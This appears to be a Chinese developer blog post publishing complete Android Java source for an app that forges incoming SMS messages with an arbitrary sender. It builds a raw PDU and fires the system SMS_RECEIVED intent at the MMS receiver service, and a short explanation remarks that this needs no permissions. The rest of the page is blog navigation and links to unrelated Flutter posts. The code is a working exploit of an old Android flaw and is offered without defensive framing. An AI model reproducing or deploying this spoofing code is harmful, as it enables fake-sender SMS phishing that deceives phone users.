iaiai
- 浏览: 2196794 次
- 性别:
- 来自: 北京
-
文章分类
- 全部博客 (1240)
- mac/IOS (287)
- flutter (1)
- J2EE (115)
- android基础知识 (582)
- android中级知识 (55)
- android组件(Widget)开发 (18)
- android 错误 (21)
- javascript (18)
- linux (70)
- 树莓派 (18)
- gwt/gxt (1)
- 工具(IDE)/包(jar) (18)
- web前端 (17)
- java 算法 (8)
- 其它 (5)
- chrome (7)
- 数据库 (8)
- 经济/金融 (0)
- english (2)
- HTML5 (7)
- 网络安全 (14)
- 设计欣赏/设计窗 (8)
- 汇编/C (8)
- 工具类 (4)
- 游戏 (5)
- 开发频道 (5)
- Android OpenGL (1)
- 科学 (4)
- 运维 (0)
- 好东西 (6)
- 美食 (1)
最新评论
-
liangzai_cool:
请教一下,文中,shell、C、Python三种方式控制led ...
树莓派 - MAX7219 -
jiazimo:
...
Kafka源码分析-序列5 -Producer -RecordAccumulator队列分析 -
hp321:
Windows该命令是不是需要安装什么软件才可以?我试过不行( ...
ImageIO读jpg的时候出现javax.imageio.IIOException: Unsupported Image Type -
hp321:
Chenzh_758 写道其实直接用一下代码就可以解决了:JP ...
ImageIO读jpg的时候出现javax.imageio.IIOException: Unsupported Image Type -
huanghonhpeng:
大哥你真强什么都会,研究研究。。。。小弟在这里学到了很多知识。 ...
android 浏览器
代码实现
实质分析 核心在于自定义了系统的
收到短信的intent,从而伪造了短信,而且不需要任何的权限。
package com.smstrick;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.lang.reflect.Method;
import java.util.Calendar;
import java.util.GregorianCalendar;
import android.app.Activity;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.telephony.PhoneNumberUtils;
import android.util.Log;
import android.view.View;
import android.view.View.OnClickListener;
import android.widget.EditText;
public class SMSTrickActivity extends Activity implements OnClickListener{
/** Called when the activity is first created. */
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
View continue_button = this.findViewById(R.id.button1);
continue_button.setOnClickListener((OnClickListener) this);
}
public void onClick(View v) {
EditText eNum;
EditText eMsg;
String sNum;
String sMsg;
eNum = (EditText)findViewById(R.id.editText1);
eMsg = (EditText)findViewById(R.id.editText2);
sNum = eNum.getText().toString();
sMsg = eMsg.getText().toString();
//sNum cannot be blank
if(sNum.equals("")) sNum = "123456";
createFakeSms(this.getApplicationContext(),sNum,sMsg);
}
private static void createFakeSms(Context context, String sender, String body) {
//Source: http://stackoverflow.com/a/12338541
//Source: http://blog.dev001.net/post/14085892020/android-generate-incoming-sms-from-within-your-app
byte[] pdu = null;
byte[] scBytes = PhoneNumberUtils
.networkPortionToCalledPartyBCD("0000000000");
byte[] senderBytes = PhoneNumberUtils
.networkPortionToCalledPartyBCD(sender);
int lsmcs = scBytes.length;
byte[] dateBytes = new byte[7];
Calendar calendar = new GregorianCalendar();
dateBytes[0] = reverseByte((byte) (calendar.get(Calendar.YEAR)));
dateBytes[1] = reverseByte((byte) (calendar.get(Calendar.MONTH) + 1));
dateBytes[2] = reverseByte((byte) (calendar.get(Calendar.DAY_OF_MONTH)));
dateBytes[3] = reverseByte((byte) (calendar.get(Calendar.HOUR_OF_DAY)));
dateBytes[4] = reverseByte((byte) (calendar.get(Calendar.MINUTE)));
dateBytes[5] = reverseByte((byte) (calendar.get(Calendar.SECOND)));
dateBytes[6] = reverseByte((byte) ((calendar.get(Calendar.ZONE_OFFSET) + calendar
.get(Calendar.DST_OFFSET)) / (60 * 1000 * 15)));
try {
Log.d("ice", "test one");
ByteArrayOutputStream bo = new ByteArrayOutputStream();
bo.write(lsmcs);
bo.write(scBytes);
bo.write(0x04);
bo.write((byte) sender.length());
bo.write(senderBytes);
bo.write(0x00);
bo.write(0x00); // encoding: 0 for default 7bit
bo.write(dateBytes);
try {
String sReflectedClassName = "com.android.internal.telephony.GsmAlphabet";
Class cReflectedNFCExtras = Class.forName(sReflectedClassName);
Method stringToGsm7BitPacked = cReflectedNFCExtras.getMethod(
"stringToGsm7BitPacked", new Class[] { String.class });
stringToGsm7BitPacked.setAccessible(true);
byte[] bodybytes = (byte[]) stringToGsm7BitPacked.invoke(null,
body);
bo.write(bodybytes);
} catch (Exception e) {
e.printStackTrace();
}
pdu = bo.toByteArray();
} catch (IOException e) {
e.printStackTrace();
}
Intent intent = new Intent();
intent.setClassName("com.android.mms",
"com.android.mms.transaction.SmsReceiverService");
intent.setAction("android.provider.Telephony.SMS_RECEIVED");
intent.putExtra("pdus", new Object[] { pdu });
//intent.putExtra("format", "3gpp");
context.startService(intent);
}
private static byte reverseByte(byte b) {
return (byte) ((b & 0xF0) >> 4 | (b & 0x0F) << 4);
}
}
实质分析 核心在于自定义了系统的
Intent intent = new Intent();
intent.setClassName("com.android.mms",
"com.android.mms.transaction.SmsReceiverService");
intent.setAction("android.provider.Telephony.SMS_RECEIVED");
intent.putExtra("pdus", new Object[] { pdu });
//intent.putExtra("format", "3gpp");
context.startService(intent);
收到短信的intent,从而伪造了短信,而且不需要任何的权限。
分享到:
发表评论
-
带你深入理解 FLUTTER 中的字体“冷”知识
2020-08-10 23:40 627本篇将带你深入理解 Flutter 开发过程中关于字体和文 ... -
Flutter -自定义日历组件
2020-03-01 17:56 1100颜色文件和屏幕适配的文件 可以自己给定 import ... -
Dart高级(一)——泛型与Json To Bean
2020-02-23 19:13 993从 Flutter 发布到现在, 越来越多人开始尝试使用 Da ... -
flutter loading、Progress进度条
2020-02-21 17:03 1167Flutter Progress 1 条形无固定值进度条 ... -
Flutter使用Https加载图片
2020-02-21 01:39 1004Flutter使用Https加载图片 使用http加载图片出 ... -
flutter shared_preferences 异步变同步
2020-02-21 00:55 839前言 引用 在开发原生iOS或Native应用时,一般有判断上 ... -
Flutter TextField边框颜色
2020-02-19 21:31 929监听要销毁 myController.dispose(); T ... -
flutter Future的正确用法
2020-02-18 21:55 800在flutter中经常会用到异步任务,dart中异步任务异步处 ... -
记一次Flutter简单粗暴处理HTTPS证书检验方法
2020-02-18 14:13 949最近在做Flutter项目到了遇到一个无解的事情,当使用Ima ... -
flutter 获取屏幕宽度高度 通知栏高度等屏幕信息
2019-07-27 08:39 1327##MediaQuery MediaQuery.of(con ... -
关于flutter RefreshIndicator扩展listview下拉刷新的问题
2019-07-10 19:40 1113当条目过少时listview某些嵌套情况下可能不会滚动(条目 ... -
flutter listview 改变状态的时候一直无限添加
2019-07-10 16:01 778setstate的时候会一直无限的调用listview.bui ... -
Flutter Android端启动白屏问题的解决
2019-07-09 00:51 1507问题描述 Flutter 应用在 Android 端上启动时 ... -
Flutter中SnackBar使用
2019-07-08 23:43 766底部弹出,然后在指定时间后消失。 注意: build(Bui ... -
Flutter 之点击空白区域收起键盘
2019-07-08 18:43 1782点击空白处取消TextField焦点这个需求是非常简单的,在学 ... -
Flutter 弹窗 Dialog ,AlertDialog,IOS风格
2019-07-08 18:04 1370import 'package:flutter/mate ... -
flutter ---TextField 之 输入类型、长度限制
2019-07-08 14:30 2313TextField想要实现输入类型、长度限制需要先引入impo ... -
【flutter 溢出BUG】键盘上显示bottom overflowed by 104 PIXELS
2019-07-08 11:13 1549一开始直接使用Scaffold布局,body:new Colu ... -
解决Flutter项目卡在Initializing gradle...界面的问题
2019-07-07 12:53 865Flutter最近很火,我抽出了一点时间对Flutter进行了 ... -
关于android O 上 NotificationChannel 的一些注意事项
2019-07-04 11:47 932最近在适配android O,遇到个问题,应用中原本有设置界面 ...
相关推荐
短信生成神器,解决了android4.4写短信无权限的问题, 可自动生成内容,也可以写动输入内容,可随机生成收发件箱也可选择,还可选汉语或英文字母,用以测试短信的备份还方便
在描述中提到的短信伪造漏洞是指CVE-2012-6636,这是一处允许恶意应用伪造短信来源的漏洞。攻击者可以利用这个漏洞发送看起来来自可信源的欺诈短信,诱导用户执行有害操作,例如点击恶意链接或泄露个人信息。此漏洞...
1. **权限管理机制**:Android基于Linux内核,采用权限管理系统,每个应用在安装时会被赋予特定的权限,如读取联系人、发送短信等。用户在安装应用时需明确这些权限,以防止恶意应用滥用权限。然而,一些应用可能会...
2. **权限检查**:恶意程序往往请求不必要的权限,如访问联系人、短信、位置等。通过对APP请求的权限进行分析,可以发现异常行为。 3. **代码混淆与反混淆**:恶意软件常使用代码混淆技术隐藏真实意图。静态分析...
这可能涉及网络通信协议分析,以及如何伪造数据以绕过拦截规则。 3. **隐私保护措施**: 隐私保护通常包括权限管理、数据加密和数据隔离。开发者可以通过源码学习如何检测应用请求的敏感权限,以及如何防止未授权...
FakeSMS (with broadAnywhere(Bug: 17356824))Android本地生成PDU伪造任意短信代码(支持中文GSM_UCS2)新版使用伪造短信PDU,无权限要求。APK下载:
撤消应用程序的Android权限通常会使应用程序崩溃或发生故障。 XPrivacyLua通过为应用程序提供假数据而不是真实数据来解决此问题。 特征 使用简单 管理任何用户或系统应用 多用户支持 免费和开源 限制 确定活动(假...
Android远程监控技术一节则介绍了在Android平台上实现远程监控的技术细节,包括如何伪造短信来实现监控目的,这对于手机安全和隐私保护是一个重要议题。 整体来看,《黑客防线》杂志2013年6月刊涉及的内容非常丰富...
1. **权限管理**:Android系统赋予了应用程序不同的权限,如读取联系人、短信、位置信息等。开发者需要明确声明所需的权限,并在用户安装应用时进行提示。项目中可能涉及如何合理设置和使用这些权限,确保应用功能的...
v5.0对SQL注入、跨站脚本攻击(XSS)、跨站请求伪造(CSRF)等主要威胁进行了系统的处理,实现了灵活、细致的权限管理功能,充分构筑了应用程序级安全。 8、易于扩展,便于开发 v5.0站点导航可自定义、可快速增加...
3. 用户认证与授权:实现用户登录系统,可能涉及用户名/密码验证、多因素认证(MFA,如短信验证码、指纹识别等)和权限控制。Spring Security是一个流行的Java框架,可用于处理这些问题。 4. 客户端应用:创建一个...